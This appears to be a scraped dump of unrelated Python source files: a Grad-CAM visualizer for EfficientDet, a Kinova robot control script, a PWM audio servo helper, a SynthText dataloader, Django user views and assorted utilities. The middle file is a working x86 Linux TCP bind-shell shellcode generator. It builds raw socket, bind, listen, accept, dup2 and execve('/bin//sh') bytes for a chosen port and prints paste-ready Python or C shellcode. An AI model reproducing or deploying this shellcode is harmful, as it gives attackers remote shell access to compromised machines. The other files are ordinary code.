print("[benchmark] Saving plot to '" + file_name + "'")
fig.savefig(file_name, bbox_inches=bounding_box)
|
"""
Gradcam visualization ref modified from implementation by fchollet (https://keras.io/examples/vision/grad_cam)
"""
import cv2
import numpy as np
import os
import sys
import argparse
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
# Display
import matplotlib.cm as cm
from model_modified import efficientdet_mod
from model import efficientdet
from utils import preprocess_image
def parse_args(args):
"""
Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Gradcam visualization script for Efficientdet.')
parser.add_argument('--model_path', help='Path to trained model.', default='efficientdet-d1.h5')
parser.add_argument('--phi', help='Hyper parameter phi', default=1, type=int, choices=(0, 1, 2, 3, 4, 5, 6))
parser.add_argument('--viz_cls', help='coco class to visualize', type=int, default=0)
parser.add_argument('--img_path', help='image to visualize', default='sample\\person.jpg')
print(vars(parser.parse_args(args)))
return parser.parse_args(args)
def main(args=None):
# parse arguments
if args is None:
args = sys.argv[1:]
args = parse_args(args)
image_path = args.img_path
top_pred_index = args.viz_cls
model_path = args.model_path
phi = args.phi
weighted_bifpn = True
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
num_classes = 90
score_threshold = 0.3
#load modified efficientdet
#get the last conv layer before inference and prediction models
conv_layer_out,pred_models = efficientdet_mod(phi=phi,
weighted_bifpn=weighted_bifpn,
num_classes=num_classes,
score_threshold=score_threshold)
num_layers = len(conv_layer_out)
for i in range(num_layers):
conv_layer_out[i].load_weights(model_path, by_name=True)
pred_models[i].load_weights(model_path, by_name=True)
image = cv2.imread(image_path)
src_image = image.copy()
# BGR -> RGB
image = image[:, :, ::-1]
h, w = image.shape[:2]
image, scale = preprocess_image(image, image_size=image_size)
#to be used for display
img = keras.preprocessing.image.img_to_array(image)
image = [np.expand_dims(image, axis=0)]
#Create an combined image with all gradcams from different layers
out_image = np.zeros((image_size*2,image_size*3,3), np.uint8)
out_image[0:h,0:w,:] = src_image
display_row = 0
display_col = 0
for i in range(0,num_layers):
#relative position is merged display image
display_col += 1
if display_col == 3:
display_row = 1
display_col = 0
with tf.GradientTape() as tape:
last_conv_layer_output = conv_layer_out[i](image)
preds = pred_models[i](last_conv_layer_output)
top_class_channel = preds[:, :, top_pred_index]
# use automatic differentiation to compute the gradients
grads = tape.gradient(top_class_channel, last_conv_layer_output)
# compute the guided gradients
castConvOutputs = tf.math.abs(last_conv_layer_output)
castGrads = tf.cast(grads > 0, "float32")
guidedGrads = castConvOutputs * castGrads * grads
convOutputs = last_conv_layer_output[0]
guidedGrads = guidedGrads[0]
# compute the average of the gradient values, and using them
# as weights, compute the ponderation of the filters with
# respect to the weights
weights = tf.reduce_mean(guidedGrads, axis=(0, 1))
cam = tf.reduce_sum(tf.multiply(weights, convOutputs), axis=-1)
heatmap = cv2.resize(cam.numpy(), (image_sizes[phi], image_sizes[phi]))
# normalize the heatmap such that all values lie in the range
# [0, 1], scale the resulting values to the range [0, 255],
# and then convert to an unsigned 8-bit integer
eps = 0.000001
numer = heatmap - np.min(heatmap)
denom = (heatmap.max() - heatmap.min()) + eps
heatmap = numer / denom
heatmap = (heatmap * 255).astype("uint8")
# We use jet colormap to colorize heatmap
jet = cm.get_cmap("jet")
# We use RGB values of the colormap
jet_colors = jet(np.arange(256))[:, :3]
jet_heatmap = jet_colors[heatmap]
# We create an image with RGB colorized heatmap
jet_heatmap = keras.preprocessing.image.array_to_img(jet_heatmap)
jet_heatmap = jet_heatmap.resize((image_sizes[phi], image_sizes[phi]))
jet_heatmap = keras.preprocessing.image.img_to_array(jet_heatmap)
#exchange b and r
jet_heatmap = jet_heatmap[:, :, ::-1]
# Superimpose the heatmap on original image
superimposed_img = jet_heatmap * 0.3 + img
superimposed_img = keras.preprocessing.image.array_to_img(superimposed_img)
out_image[display_row*image_size:(display_row+1)*image_size,
display_col*image_size:(display_col+1)*image_size,:] = superimposed_img
cv2.imwrite("out.jpg",out_image)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
from environments import SimulatorKinovaGripper, SimulatorKinovaGripperInverseJacobian, MultiPointReacher, FullDOFKinovaReacher, TwoJointPlanarKinova
from environments import TwoJointVisualPlanarKinova, FOURDOFKinovaReacher
import sys
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
from visualservoing import PickPolicy, TwoDOFInverseJacobian
import time
import numpy as np
try:
import rospy
except:
print("no rospy")
#TODO figure out how to just run things in the module folders
#this is a work around for annoying error I was getting when I'd run things in the modules...
if __name__ == "__main__":
#env = SimulatorKinovaGripper(target_generation = 'kinematic')
#env = SimulatorKinovaGripper(target_generation = 'fixed')
#policy = InverseJacobian(gain= 1.0)
#policy = MultiPointInverseJacobian(gain= 1.0)
#policy = LocalLeastSquareUVS(gain=1.0, num_pts=4, pts_dim=3, min_experience=10000, k=50, solve_least_square_together=True)
#policy = AmmortizedLocalLeastSquareUVS(gain=1.0, num_pts=4, pts_dim=3, min_experience=100000,capacity=100000, inputs=45, outputs=84)
#policy = UncalibratedVisuoServoing(gain= 1.0, n_updates=10, use_broyden=False)
rewards ='l2' #'l2,l1,precision,action-norm,discrete-time-penalty,keep-moving'
print("hello world")
custom_bound = FullDOFKinovaReacher.generate_custom_bounds(symmetric_bound = [np.inf, 1.2, np.inf, 1.2, np.inf, 1.2, np.inf])
print(custom_bound)
env = FullDOFKinovaReacher(joint_bounds=custom_bound, target_bounds=custom_bound, H = 200, reward_type=rewards)
#env = TwoJointPlanarKinova(H=200)
#env = TwoJointVisualPlanarKinova(H=200, target_bounds = custom_bound)
#env = FOURDOFKinovaReacher(H = 200, target_bounds = custom_bound,
# joint_bounds = custom_bound, reward_type=rewards)
#policy = PickPolicy("local-uvs", 0.5, 1, 2, 2)
#policy = PickPolicy("broyden", 0.1, 1, 2, 2)
policy = PickPolicy("inversejacobian", 0.5, num_pts= 1, pts_dim= 3, num_actuators=7)
#policy = TwoDOFInverseJacobian(TwoJointPlanarKinova.L1, TwoJointPlanarKinova.L2, gain = 0.5)
print("we created environment")
#env = SimulatorKinovaGripper(dt=0.05, reward_type=rewards)
#env = SimulatorKinovaGripperInverseJacobian(target_generation='fixed')
#env = MultiPointReacher(dt=0.1)
policy.learn(env)
print('hello world of gym parameters')
print("observation space", env.observation_space)
print("action space", env.action_space)
print("env type", type(env))
i = 0
print(env.kinova_listener.control_joints)
if isinstance(env, TwoJointVisualPlanarKinova):
env.publish_to_camera(capture_target=True, save_path='./video.avi')
obs = env.reset()
returns = 0.0
#while True:
for i in range(100 * 20):
env.render()
#a = env.action_space.sample()
a = policy.act(obs)
#a = np.array([0, 0.0, 0, 0.0, 0.0, 0.1, 0.0])
if rospy.is_shutdown():
break
#act = env.action_space.sample()#np.ones((7, 3)) #np.random.randn(7)
#J = policy.J
#iJ = np.linalg.pinv(J)
obs, rew, done, info = env.step(a)
#print(obs[0:2], obs[8:10], 'position', 'target')
print(rew, obs[0:3], obs[-3:], obs.shape)
#print(obs)
#print(rew)
#print(done)
#print(info)
returns += rew
if done:
print(returns)
returns = 0.0
obs = env.reset()
policy.reset()
env.close()
|
#!/usr/bin/env python3
# Python primary Helper to generate PWM audio signals to control a servos
# Current setup involves sending a mono audio PWM signal from the left (or right) channel to control a servo
# We use a USB soundcard/default audio jack to output audio waveform, but since it is usually 2V peak DC, we need an Op-Amp circuit to boost to ~5V
# Please check documentation for USB powered circuit powering servo and op amp circuit
# WAV files are favoured as signal sources as they are lossless as compared to MP3
# Sound player module fallback is ffmpeg, but for windows systems it is better to install PYAUDIO, since it does not need to access restricted folders to generate a temporary wav file for playing.
# To install pyaudio, some helper packages are needed first: libasound-dev portaudio19-dev libportaudio2 libportaudiocpp0 ffmpeg. Hopefully this means it plays the audio file created in situ before the entire Pulsegen class destructs after each audio command. Wholesome, organic, grass-fed audio solution...
# For playing saved .wav files, we should use python sounddevices to choose the output device first
# Made 2019, <NAME>
# mingsongwu [at] outlook [dot] sg
###
from ctypes import *
from contextlib import contextmanager
import time
from pydub import AudioSegment
from pydub.generators import SignalGenerator
# from pydub.playback import play
from extraFunctions import play
import os, sys
SHOWERROR = False
## removing buggy/useless ALSA pyaudio errors. Does not affect audio output.
ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)
def py_error_handler(filename, line, function, err, fmt):
pass
c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)
@contextmanager
def noALSAerror():
if not SHOWERROR:
# stackoverflow.com/a/36966379
devnull = os.open(os.devnull, os.O_WRONLY)
old_stderr = os.dup(2)
sys.stderr.flush()
os.dup2(devnull, 2)
os.close(devnull)
try:
yield
finally:
os.dup2(old_stderr, 2)
os.close(old_stderr)
else:
asound = cdll.LoadLibrary('libasound.so')
asound.snd_lib_error_set_handler(c_error_handler)
yield
asound.snd_lib_error_set_handler(None)
##
class Pulsegen(SignalGenerator):
PANLEFT = -1
PANRIGHT = 1
def __init__(self, duty, polarity = True, freq = 51, duration = 400, pan = -1, **kwargs):
super().__init__(**kwargs)
self.freq = freq
self.duty = duty
self.polarity = polarity
self.duration = duration
## pan function is volume equaliser: -1 = 100% left, 1 = 100% right
self.pan = pan
def generate(self):
sample_n = 0
# in samples
cycle_length = self.sample_rate / float(self.freq)
pulse_length = cycle_length * self.duty
while True:
if (sample_n % cycle_length) < pulse_length:
if self.polarity == True:
yield 1.0
else:
yield -1.0
else:
yield 0
sample_n += 1
def playpulse(self):
sound_segment = self.to_audio_segment(self.duration)
## pan function is volume equaliser: -1 = 100% left, 1 = 100% right
sound_segment = sound_segment.pan(self.pan)
## setting channels instead is possible, but using stereo output effectively sends mono signal through both channel contacts = stereo output
#sound_segment = sound_segment.set_channels(1)
with noALSAerror():
play(sound_segment)
def setPan(self, pan):
self.pan = pan
def __enter__(self):
# print('\nPulse generator initialising...done\n')
return self
def __exit__(self, e_type, e_val, traceback):
# print('\nPulse generator self destructing...done')
pass
|
import os
os.system("clear")
os.system("cowsay ShellC0de - Tegal1337 | lolcat")
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
hexPort = "0" + hexPort
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
nullCheck = deciPort % 256
if nullCheck == 0 :
print "Your TCP Port contains a Null 0x00."
print "Try again with a different Port Number."
exit(0)
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
# ; Allowing us to create connected Sockets.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
shellcode += '\\x'
shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
shellcode += '\\x'
shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = Python\n[2] = C\n[99] = Help\nsenpai@tegalsec:~# ")
if exportFormat == "1" :
formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[-----------------------Your-Shellcode------------------------]"
print 'shellcode = "'+formatSC+'"'
elif exportFormat == "2" :
formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[----------------Your-Shellcode------------------]"
print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'
elif exportFormat == "99":
print '''What Is Shellcode?
In the field of computer security [Wikipedia]
[ExploitDB] https://www.exploit-db.com/shellcodes
Code Using https://www.exploit-db.com/shellcodes/48032
'''
else:
print "Your Brain Error!"
|
<filename>train_synth/dataloader.py<gh_stars>0
from torch.utils import data
import matplotlib.pyplot as plt
import numpy as np
import cv2
import os
import train_synth.config as config
from src.utils.data_manipulation import resize, normalize_mean_variance, generate_affinity, generate_target
"""
globally generating gaussian heatmap which will be warped for every character bbox
"""
class DataLoaderSYNTH(data.Dataset):
"""
DataLoader for strong supervised training on Synth-Text
"""
DEBUG = False # Make this True if you want to do a run on small set of Synth-Text
def __init__(self, type_):
self.type_ = type_
self.base_path = config.DataLoaderSYNTH_base_path
if DataLoaderSYNTH.DEBUG:
# To check for small data sample of Synth
if not os.path.exists('cache.pkl'):
# Create cache of 1000 samples if it does not exist
with open('cache.pkl', 'wb') as f:
import pickle
from scipy.io import loadmat
mat = loadmat(config.DataLoaderSYNTH_mat)
pickle.dump([mat['imnames'][0][0:1000], mat['charBB'][0][0:1000], mat['txt'][0][0:1000]], f)
print('Created the pickle file, rerun the program')
exit(0)
else:
# Read the Cache
with open('cache.pkl', 'rb') as f:
import pickle
self.imnames, self.charBB, self.txt = pickle.load(f)
print('Loaded DEBUG')
else:
from scipy.io import loadmat
mat = loadmat(config.DataLoaderSYNTH_mat) # Loads MATLAB .mat extension as a dictionary of numpy arrays
# Read documentation of how synth-text dataset is stored to understand the processing at
# http://www.robots.ox.ac.uk/~vgg/data/scenetext/readme.txt
total_number = mat['imnames'][0].shape[0]
train_images = int(total_number * 0.9)
if self.type_ == 'train':
self.imnames = mat['imnames'][0][0:train_images]
self.charBB = mat['charBB'][0][0:train_images] # number of images, 2, 4, num_character
self.txt = mat['txt'][0][0:train_images]
else:
self.imnames = mat['imnames'][0][train_images:]
self.charBB = mat['charBB'][0][train_images:] # number of images, 2, 4, num_character
self.txt = mat['txt'][0][train_images:]
for i, x in enumerate(self.charBB):
try:
self.charBB[i] = list(np.array(x).squeeze().transpose(2,1,0))
except:
self.charBB[i] = list(np.expand_dims(np.array(x).squeeze(), 0).transpose(2,1,0))
txt_list = []
for no, i in enumerate(self.txt):
all_words = []
for j in i:
all_words += [k for k in ' '.join(j.split('\n')).split() if k != '']
# Getting all words given paragraph like text in SynthText
txt_list.append(all_words)
self.txt = txt_list
def __getitem__(self, item):
item = item % len(self.imnames)
#image = plt.imread(self.imnames[item]) # Read the image
image = plt.imread(self.base_path+'/'+self.imnames[item][0]) # Read the image
if len(image.shape) == 2:
image = np.repeat(image[:, :, None], repeats=3, axis=2)
elif image.shape[2] == 1:
image = np.repeat(image, repeats=3, axis=2)
else:
image = image[:, :, 0: 3]
image, character = resize(image, np.array(self.charBB[item].copy())) # Resize the image to (768, 768)
normal_image = image.astype(np.uint8).copy()
image = normalize_mean_variance(image).transpose(2, 0, 1)
# Generate character heatmap
weight_character = generate_target(image.shape, character.copy())
# Generate affinity heatmap
weight_affinity, affinity_bbox = generate_affinity(image.shape, character.copy(), self.txt[item].copy())
cv2.drawContours(
normal_image,
np.array(affinity_bbox).reshape([len(affinity_bbox), 4, 1, 2]).astype(np.int64), -1, (0, 255, 0), 2)
enlarged_affinity_bbox = []
for i in affinity_bbox:
center = np.mean(i, axis=0)
i = i - center[None, :]
i = i*60/25
i = i + center[None, :]
enlarged_affinity_bbox.append(i)
cv2.drawContours(
normal_image,
np.array(enlarged_affinity_bbox).reshape([len(affinity_bbox), 4, 1, 2]).astype(np.int64),
-1, (0, 0, 255), 2
)
return \
image.astype(np.float32), \
weight_character.astype(np.float32), \
weight_affinity.astype(np.float32), \
normal_image
def __len__(self):
if self.type_ == 'train':
return int(len(self.imnames)*config.num_epochs_strong_supervision)
else:
return len(self.imnames)
class DataLoaderEval(data.Dataset):
"""
DataLoader for evaluation on any custom folder given the path
"""
def __init__(self, path):
self.base_path = path
self.imnames = [x for x in sorted(os.listdir(self.base_path)) if x[-3:]=='jpg']
def __getitem__(self, item):
image = plt.imread(self.base_path+'/'+self.imnames[item]) # Read the image
if len(image.shape) == 2:
image = np.repeat(image[:, :, None], repeats=3, axis=2)
elif image.shape[2] == 1:
image = np.repeat(image, repeats=3, axis=2)
else:
image = image[:, :, 0: 3]
# ------ Resize the image to (768, 768) ---------- #
height, width, channel = image.shape
max_side = max(height, width)
new_resize = (int(width / max_side * 768), int(height / max_side * 768))
image = cv2.resize(image, new_resize)
big_image = np.ones([768, 768, 3], dtype=np.float32) * np.mean(image)
big_image[
(768 - image.shape[0]) // 2: (768 - image.shape[0]) // 2 + image.shape[0],
(768 - image.shape[1]) // 2: (768 - image.shape[1]) // 2 + image.shape[1]] = image
big_image = normalize_mean_variance(big_image)
big_image = big_image.transpose(2, 0, 1)
return big_image.astype(np.float32), self.imnames[item], np.array([height, width])
def __len__(self):
return len(self.imnames)
|
<gh_stars>0
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.urls import reverse
from django.views.generic import UpdateView
from bakery.views import BuildableDetailView
from rest_framework import viewsets
from rest_framework.permissions import IsAdminUser
from wafer.talks.models import ACCEPTED
from wafer.users.forms import UserForm, UserProfileForm
from wafer.users.serializers import UserSerializer
from wafer.users.models import UserProfile
from wafer.utils import PaginatedBuildableListView
log = logging.getLogger(__name__)
class UsersView(PaginatedBuildableListView):
template_name = 'wafer.users/users.html'
model = get_user_model()
paginate_by = 25
build_prefix = 'users'
def get_queryset(self, *args, **kwargs):
qs = super(UsersView, self).get_queryset(*args, **kwargs)
if not settings.WAFER_PUBLIC_ATTENDEE_LIST:
qs = qs.filter(talks__status=ACCEPTED).distinct()
qs = qs.order_by('first_name', 'last_name', 'username')
return qs
class Hide404Mixin(object):
"""Generic handling for user objects.
To prevent information leakage, we turn all 404's into
403's when the attendee list isn't public."""
def get(self, *args, **kwargs):
try:
result = super(Hide404Mixin, self).get(*args, **kwargs)
except Http404:
if not settings.WAFER_PUBLIC_ATTENDEE_LIST:
# We convert all 404's to 403's to prevent info leakage
# about which users actually exist and which are
# just private.
raise PermissionDenied()
# For public attendee lists, 404 is the right thing
raise
return result
class ProfileView(Hide404Mixin, BuildableDetailView):
template_name = 'wafer.users/profile.html'
model = get_user_model()
slug_field = 'username'
slug_url_kwarg = 'username'
# avoid a clash with the user object used by the menus
context_object_name = 'profile_user'
def get_url(self, obj):
return reverse('wafer_user_profile', args=(obj.username,))
def build_object(self, obj):
"""Override django-bakery to skip profiles that raise 404"""
try:
build_path = self.get_build_path(obj)
self.request = self.create_request(build_path)
self.request.user = AnonymousUser()
self.set_kwargs(obj)
self.build_file(build_path, self.get_content())
except Http404:
# cleanup directory
self.unbuild_object(obj)
def get_object(self, *args, **kwargs):
object_ = super(ProfileView, self).get_object(*args, **kwargs)
if not settings.WAFER_PUBLIC_ATTENDEE_LIST:
if (not self.can_edit(object_) and
not object_.userprofile.accepted_talks().exists()):
raise PermissionDenied()
return object_
def get_context_data(self, **kwargs):
context = super(ProfileView, self).get_context_data(**kwargs)
context['can_edit'] = self.can_edit(context['object'])
return context
def can_edit(self, user):
is_self = user == self.request.user
return is_self or self.request.user.has_perm(
'users.change_userprofile')
# TODO: Combine these
class EditOneselfMixin(Hide404Mixin):
"""Extend the behaviour with edit permission checks."""
def get_object(self, *args, **kwargs):
object_ = super(EditOneselfMixin, self).get_object(*args, **kwargs)
self.verify_edit_permission(object_)
return object_
def verify_edit_permission(self, object_):
if hasattr(object_, 'user'): # Accept User or UserProfile
object_ = object_.user
if object_ == self.request.user or self.request.user.has_perm(
'users.change_userprofile'):
return
if settings.WAFER_PUBLIC_ATTENDEE_LIST:
raise Http404()
else:
raise PermissionDenied()
class EditUserView(EditOneselfMixin, UpdateView):
template_name = 'wafer.users/edit_user.html'
slug_field = 'username'
slug_url_kwarg = 'username'
model = get_user_model()
form_class = UserForm
# avoid a clash with the user object used by the menus
context_object_name = 'profile_user'
def get_success_url(self):
return reverse('wafer_user_profile', args=(self.object.username,))
class EditProfileView(EditOneselfMixin, UpdateView):
template_name = 'wafer.users/edit_profile.html'
slug_field = 'user__username'
slug_url_kwarg = 'username'
model = UserProfile
form_class = UserProfileForm
# avoid a clash with the user object used by the menus
context_object_name = 'profile_user'
def get_success_url(self):
return reverse('wafer_user_profile', args=(self.object.user.username,))
class UserViewSet(viewsets.ModelViewSet):
"""API endpoint for users."""
queryset = get_user_model().objects.all()
serializer_class = UserSerializer
# We want some better permissions than the default here, but
# IsAdminUser will do for now.
permission_classes = (IsAdminUser, )
|
import sys
sys.path.append('../')
import bz2, os
import random, string
import importlib
import _pickle as pickle
from datetime import datetime, timedelta
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# OS & list MANAGEMENT FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
def find(name, path):
# Find the file name in any of the directories or sub-directories in the path
for root, dirs, files in os.walk(path):
if name in files:
return os.path.join(root, name)
def getFilepaths(directory):
"""
This function will generate the file names in a directory
tree by walking the tree either top-down or bottom-up. For each
directory in the tree rooted at directory top (including top itself),
it yields a 3-tuple (dirpath, dirnames, filenames).
"""
file_paths = [] # List which will store all of the full filepaths.
# Walk the tree.
for root, directories, files in os.walk(directory):
for filename in files:
# Join the two strings in order to form the full filepath.
filepath = os.path.join(root, filename)
file_paths.append(filepath) # Add it to the list.
return file_paths # Self-explanatory.
def absoluteFilePaths(directory):
'''Get the absolute file path for every file in the given directory'''
for dirpath,_,filenames in os.walk(directory):
for f in filenames:
yield os.path.abspath(os.path.join(dirpath, f))
def import_package_string(package_string):
'''Submit a string argument to be imported as a package (i.e. day_trader.models.LU01_A3). No need to include the .py'''
return importlib.import_module(package_string)
def genrs(length=10):
'''Generate random string'''
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def remove_values_from_list(the_list, val):
'''Remove a specific value from a list'''
return [value for value in the_list if value != val]
def chunks(l,n):
'''Break list l up into chunks of size n'''
for i in range(0, len(l), n):
yield l[i:i+n]
def sizeFirstBin(data, col, minimum_bin_size, vals=None):
'''Bin the data based on the vals, iterates through each val assigning the corresponding rows to a bin while that bin size has not reached the minimum_bin_size
__________
parameters
- data : pd.DataFrame
- col : the columns to bin based on
- minimum_bin_size : int. Each bin must have at least this size
- vals : list. Will only bin the values in this list. The default is all the unique values of "col"
'''
if vals is None:
values = sorted(data[col].unique())
else:
values = vals
bins = {}
bin_number = 1
bin_total = 0
vc = dict(data[col].value_counts())
for val in values:
if bin_total<minimum_bin_size:
if bin_number not in bins:
bins[bin_number] = []
bins[bin_number].append(val)
bin_total += vc[val]
else:
bins[bin_number].append(val)
bin_total += vc[val]
else:
bin_number+=1
bins[bin_number] = []
bins[bin_number].append(val)
bin_total = vc[val]
return bins
def nondups(items : list):
'''Return True if list has no duplicate items'''
print('List length:',len(items))
